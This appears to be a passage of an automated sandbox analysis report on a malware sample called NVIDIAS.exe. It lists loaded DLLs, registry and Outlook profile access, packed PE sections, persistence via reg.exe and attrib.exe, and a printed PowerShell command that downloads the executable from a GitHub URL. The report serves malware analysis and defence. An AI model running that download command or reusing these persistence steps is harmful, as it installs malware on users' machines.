Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: ntkrnlmp.pdbxC4 source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbtmpx87^ source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbndows PowerShell.lnk source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Security.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: ntkrnlmp.pdbmb;~f source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.IO.Compression.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Configuration.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: winload_prod.pdb source: NVIDIAS.exe, 00000015.00000002.1218454425.00000000069E9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb/ source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\tdataac4 source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Drawing.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Management.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ws\ source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.pdbH source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\** source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Security.pdb24 source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*a source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\*ae source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.pdbH source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"			Jump to behavior

Source: NVIDIAS.exe.20.dr

Static PE information: 0x96EB7DA4 [Sun Mar 27 17:38:44 2050 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .>h"

Source: NVIDIAS.exe.20.dr	Static PE information: section name: .4Ul
Source: NVIDIAS.exe.20.dr	Static PE information: section name: .+,2
Source: NVIDIAS.exe.20.dr	Static PE information: section name: .>h"

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03530220 push eax; ret	21_2_0353022D
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035305E0 pushad ; ret	21_2_035305ED
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_055A1777 push eax; mov dword ptr [esp], ecx	21_2_055A179C
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731B309 pushad ; iretd	21_2_0731B325
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731BBF8 push esp; ret	21_2_0731BC05
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07316970 push eax; iretd	21_2_07316971
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08301CD3 push esp; retf	21_2_08301CD4

Source: NVIDIAS.exe.20.dr

Static PE information: section name: .>h" entropy: 7.724583620670912

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QQQ\NVIDIAS.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QQQ\NVIDIAS.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
